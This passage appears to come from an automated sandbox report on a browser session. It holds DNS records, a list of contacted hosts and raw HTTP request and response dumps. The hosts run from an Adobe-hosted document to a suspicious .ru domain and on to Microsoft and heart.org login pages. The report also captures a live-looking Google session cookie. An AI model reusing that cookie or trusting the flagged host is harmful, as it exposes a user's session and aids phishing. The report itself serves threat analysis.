                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131339073 CEST1.1.1.1192.168.2.160xb0eeNo error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131339073 CEST1.1.1.1192.168.2.160xb0eeNo error (0)cs1100.wpc.omegacdn.net152.199.4.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131540060 CEST1.1.1.1192.168.2.160x5525No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131989002 CEST1.1.1.1192.168.2.160xd816No error (0)dual.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131989002 CEST1.1.1.1192.168.2.160xd816No error (0)dual.part-0012.t-0009.fb-t-msedge.netpart-0012.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131989002 CEST1.1.1.1192.168.2.160xd816No error (0)part-0012.t-0009.fb-t-msedge.net13.107.226.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131989002 CEST1.1.1.1192.168.2.160xd816No error (0)part-0012.t-0009.fb-t-msedge.net13.107.253.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.132575989 CEST1.1.1.1192.168.2.160xbc48No error (0)dual.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.132575989 CEST1.1.1.1192.168.2.160xbc48No error (0)dual.part-0012.t-0009.fb-t-msedge.netpart-0012.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.132575989 CEST1.1.1.1192.168.2.160xbc48No error (0)part-0012.t-0009.fb-t-msedge.net13.107.253.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.132575989 CEST1.1.1.1192.168.2.160xbc48No error (0)part-0012.t-0009.fb-t-msedge.net13.107.226.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.157300949 CEST1.1.1.1192.168.2.160x4a00No error (0)adfs.heart.org69.152.183.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.703134060 CEST1.1.1.1192.168.2.160x40b4No error (0)dual.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.703134060 CEST1.1.1.1192.168.2.160x40b4No error (0)dual.part-0012.t-0009.fb-t-msedge.netpart-0012.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.703134060 CEST1.1.1.1192.168.2.160x40b4No error (0)part-0012.t-0009.fb-t-msedge.net13.107.253.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.703134060 CEST1.1.1.1192.168.2.160x40b4No error (0)part-0012.t-0009.fb-t-msedge.net13.107.226.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.705014944 CEST1.1.1.1192.168.2.160xadb6No error (0)dual.part-0012.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.705014944 CEST1.1.1.1192.168.2.160xadb6No error (0)dual.part-0012.t-0009.fb-t-msedge.netpart-0012.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.705014944 CEST1.1.1.1192.168.2.160xadb6No error (0)part-0012.t-0009.fb-t-msedge.net13.107.226.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.705014944 CEST1.1.1.1192.168.2.160xadb6No error (0)part-0012.t-0009.fb-t-msedge.net13.107.253.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.710557938 CEST1.1.1.1192.168.2.160x19a4No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.710638046 CEST1.1.1.1192.168.2.160xa548No error (0)aadcdn.msftauth.netcs1100.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.710638046 CEST1.1.1.1192.168.2.160xa548No error (0)cs1100.wpc.omegacdn.net152.199.4.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.845884085 CEST1.1.1.1192.168.2.160x5373No error (0)adfs.heart.org69.152.183.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              • clients2.google.com
                                                                                                                                                                                                                                                                                                              • accounts.google.com
                                                                                                                                                                                                                                                                                                              • https:
                                                                                                                                                                                                                                                                                                                • prod.adobeccstatic.com
                                                                                                                                                                                                                                                                                                                • cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                • www.bing.com
                                                                                                                                                                                                                                                                                                                • connect.facebook.net
                                                                                                                                                                                                                                                                                                                • sstats.adobe.com
                                                                                                                                                                                                                                                                                                                • yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                                • challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                • cdn.socket.io
                                                                                                                                                                                                                                                                                                                • aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                                • aadcdn.msauth.net
                                                                                                                                                                                                                                                                                                                • logincdn.msauth.net
                                                                                                                                                                                                                                                                                                                • adfs.heart.org
                                                                                                                                                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                              • a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                              • bam-cell.nr-data.net
                                                                                                                                                                                                                                                                                                              • clients1.google.com
                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              0192.168.2.1649727172.253.62.101443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: clients2.google.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              X-Goog-Update-Interactivity: fg
                                                                                                                                                                                                                                                                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                                                                                                                                                                              X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              1192.168.2.1649728172.253.63.84443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: accounts.google.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                                                                              Origin: https://www.google.com
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: 1P_JAR=2023-10-06-09; NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:16 UTC1OUTData Raw: 20
                                                                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              10192.168.2.1649742157.240.229.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC212OUTGET /en_US/sdk.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://indd.adobe.com
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              100192.168.2.1649817104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1442OUTGET /cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              101192.168.2.1649818104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1442OUTGET /cdn-cgi/challenge-platform/h/g/pat/81bbd40e1eca59f1/1698251262359/c912553020a62bc88929094fb0f47f021340c58c3915a7cab0eeab2d7f05bdc5/cUDw1TYUdlDKuMR HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              102104.17.2.184443192.168.2.1649817C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1443INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:44 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd420cf393aee-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1443INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2d 00 00 00 60 08 02 00 00 00 06 be 6c 7f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3dPNGIHDR-`lIDAT$IENDB`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1443INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              103104.17.3.184443192.168.2.1649818C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1443INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:44 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1443INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 79 52 4a 56 4d 43 43 6d 4b 38 69 4a 4b 51 6c 50 73 50 52 5f 41 68 4e 41 78 59 77 35 46 61 66 4b 73 4f 36 72 4c 58 38 46 76 63 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                                                                                                                                                                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gyRJVMCCmK8iJKQlPsPR_AhNAxYw5FafKsO6rLX8FvcUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1445INData Raw: 31 0d 0a 4a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 1J
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1445INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              104192.168.2.1649819104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1445OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 28018
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              CF-Challenge: c7b054a34972c39
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1445OUTData Raw: 76 5f 38 31 62 62 64 34 30 65 31 65 63 61 35 39 66 31 3d 79 67 45 47 54 64 4c 6d 30 4a 67 55 67 64 57 64 64 4c 77 42 45 64 24 4c 70 4a 72 4a 55 58 57 37 4c 53 4a 35 47 4c 37 4c 44 55 4a 7a 78 55 67 58 4a 7a 57 4a 4e 63 33 45 32 46 4a 4d 39 4a 66 78 55 37 4a 59 30 43 4a 4a 61 4a 25 32 62 6e 4c 76 4a 6a 67 4c 35 79 35 4c 32 64 4a 76 47 68 65 4c 54 4a 4c 43 58 68 4a 55 47 4c 46 66 4a 55 30 4c 79 34 75 47 32 44 4e 44 35 74 6e 74 4a 4d 47 57 48 4a 57 47 57 6d 4a 6d 5a 63 47 4f 38 4a 61 76 55 71 63 4a 6b 37 4a 55 78 4a 2b 6e 58 4c 2b 39 75 6e 56 4a 64 39 59 64 2b 45 78 74 6a 24 67 53 59 67 45 78 79 32 47 67 58 57 6f 51 6a 6e 52 57 66 5a 4f 4d 4a 35 4a 73 54 46 4a 4e 58 4a 59 4d 30 57 56 6b 42 6e 50 47 44 2b 54 48 73 42 56 6e 6f 33 69 43 5a 59 50 73 47 64 68 36
                                                                                                                                                                                                                                                                                                              Data Ascii: v_81bbd40e1eca59f1=ygEGTdLm0JgUgdWddLwBEd$LpJrJUXW7LSJ5GL7LDUJzxUgXJzWJNc3E2FJM9JfxU7JY0CJJaJ%2bnLvJjgL5y5L2dJvGheLTJLCXhJUGLFfJU0Ly4uG2DND5tntJMGWHJWGWmJmZcGO8JavUqcJk7JUxJ+nXL+9unVJd9Yd+Extj$gSYgExy2GgXWoQjnRWfZOMJ5JsTFJNXJYM0WVkBnPGD+THsBVno3iCZYPsGdh6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1461OUTData Raw: 2d 64 47 4a 6d 57 4a 47 31 59 6f 4a 6b 6f 58 79 4a 61 2d 39 2d 65 4a 79 43 55 47 64 45 4a 44 4a 6a 47 4a 6a 4a 24 24 32 46 4c 57 4a 72 4a 6b 70 64 51 56 48 47 38 58 64 39 58 61 4a 55 78 64 50 4a 56 24 6a 45 32 68 4a 6d 47 6a 47 32 42 4a 44 47 35 30 4c 58 4a 70 57 4d 4a 4c 4d 4a 53 47 4c 6e 4a 72 47 79 47 6a 69 2b 6c 50 2b 47 32 39 33 4e 58 45 4a 6b 30 4c 65 4a 4e 47 4c 30 4a 24 6e 2b 51 53 78 4c 65 4a 7a 57 45 70 36 65 58 5a 6c 77 4a 4c 4b 4c 6e 48 4d 24 4a 30 4a 7a 47 4a 34 47 67 4a 6a 47 6b 78 4a 34 47 73 2d 73 45 4a 4a 4c 74 4a 38 45 4a 59 4b 55 4a 55 47 64 63 37 77 55 57 30 4a 74 4a 77 55 6a 74 4a 64 4a 37 4a 68 78 4c 78 4c 75 47 64 4a 32 50 4a 4d 4b 57 47 4d 74 4a 58 47 51 47 6b 44 4a 6b 67 4a 6e 4a 47 4a 35 47 4d 6e 64 51 4a 6f 47 57 78 64 4f 4a 53
                                                                                                                                                                                                                                                                                                              Data Ascii: -dGJmWJG1YoJkoXyJa-9-eJyCUGdEJDJjGJjJ$$2FLWJrJkpdQVHG8Xd9XaJUxdPJV$jE2hJmGjG2BJDG50LXJpWMJLMJSGLnJrGyGji+lP+G293NXEJk0LeJNGL0J$n+QSxLeJzWEp6eXZlwJLKLnHM$J0JzGJ4GgJjGkxJ4Gs-sEJJLtJ8EJYKUJUGdc7wUW0JtJwUjtJdJ7JhxLxLuGdJ2PJMKWGMtJXGQGkDJkgJnJGJ5GMndQJoGWxdOJS


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              105104.17.3.184443192.168.2.1649819C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1473INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:44 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cf-chl-gen: W2dU4CfsxoYsagOtT0K+anodcoTCRRKgdeHbbCbLLuU9Je92CaHOrKEbe9Hri3h6$7Qs8xaQr6ck66VMsLlTBAA==
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd423cc563998-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1473INData Raw: 34 32 35 38 0d 0a 6f 49 57 46 6e 4a 75 57 74 6f 57 4d 7a 4d 37 46 6b 61 75 74 73 63 75 33 7a 37 4b 70 79 4e 36 32 6c 70 4c 69 75 70 7a 50 6e 2b 43 68 76 4c 69 33 75 36 7a 62 71 38 75 39 78 37 37 72 36 72 2f 6e 7a 72 48 51 32 64 48 76 78 74 72 79 34 64 50 50 39 66 6a 63 35 4e 33 37 30 75 59 48 37 64 2f 62 41 77 58 6f 37 2b 6b 49 33 76 45 47 36 50 66 73 45 66 33 2b 45 4e 66 72 47 66 6f 43 47 2b 38 46 46 78 45 49 45 79 45 6b 46 68 6b 66 4a 77 38 6b 36 6a 59 74 44 78 55 61 49 76 63 79 4d 78 77 4b 4f 44 4d 66 4e 50 6f 32 50 52 38 6e 4b 50 73 70 4f 67 6c 4f 4c 30 4e 4b 55 69 70 48 45 54 34 76 52 30 46 43 53 46 6b 37 4e 54 63 32 56 43 74 42 55 53 46 4f 4c 31 64 67 49 7a 68 43 4c 47 73 36 53 31 41 72 61 31 51 2b 64 58 63 71 61 56 46 50 55 6e 42 48 5a 33 4e 53 4f
                                                                                                                                                                                                                                                                                                              Data Ascii: 4258oIWFnJuWtoWMzM7Fkautscu3z7KpyN62lpLiupzPn+ChvLi3u6zbq8u9x77r6r/nzrHQ2dHvxtry4dPP9fjc5N370uYH7d/bAwXo7+kI3vEG6PfsEf3+ENfrGfoCG+8FFxEIEyEkFhkfJw8k6jYtDxUaIvcyMxwKODMfNPo2PR8nKPspOglOL0NKUipHET4vR0FCSFk7NTc2VCtBUSFOL1dgIzhCLGs6S1Ara1Q+dXcqaVFPUnBHZ3NSO
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:44 UTC1474INData Raw: 7a 61 54 4a 30 38 79 56 73 37 69 33 31 4a 65 39 7a 72 47 74 6e 36 50 45 7a 72 57 38 6f 38 57 33 76 71 69 6c 32 62 71 75 38 4c 4b 2b 73 72 4f 32 77 72 61 34 75 73 61 36 76 62 37 4b 76 72 76 43 7a 73 4c 41 75 50 63 4a 78 4d 45 43 42 4f 7a 34 2f 66 33 76 30 51 49 47 45 64 55 47 36 67 6b 4e 39 4e 54 39 43 4e 6b 5a 33 74 2f 5a 45 69 41 56 39 2f 67 56 34 42 55 42 42 4f 41 6e 2b 67 73 55 4a 2f 54 31 48 79 48 76 38 7a 73 78 43 79 72 33 46 67 41 79 4d 2f 34 38 41 6b 51 5a 52 69 4d 61 51 7a 67 4c 48 51 49 49 4f 6a 30 6a 4d 78 56 54 46 6b 46 48 55 42 70 64 53 7a 63 58 54 30 46 44 4c 57 52 6d 4a 54 4a 41 51 45 46 66 4e 6b 39 65 55 58 45 79 61 45 52 50 56 47 51 32 51 31 52 70 54 57 5a 6d 5a 7a 6c 66 54 32 45 36 67 49 4a 37 68 56 52 4a 57 31 64 56 65 32 57 41 58 59 56
                                                                                                                                                                                                                                                                                                              Data Ascii: zaTJ08yVs7i31Je9zrGtn6PEzrW8o8W3vqil2bqu8LK+srO2wra4usa6vb7KvrvCzsLAuPcJxMECBOz4/f3v0QIGEdUG6gkN9NT9CNkZ3t/ZEiAV9/gV4BUBBOAn+gsUJ/T1HyHv8zsxCyr3FgAyM/48AkQZRiMaQzgLHQIIOj0jMxVTFkFHUBpdSzcXT0FDLWRmJTJAQEFfNk9eUXEyaERPVGQ2Q1RpTWZmZzlfT2E6gIJ7hVRJW1dVe2WAXYV
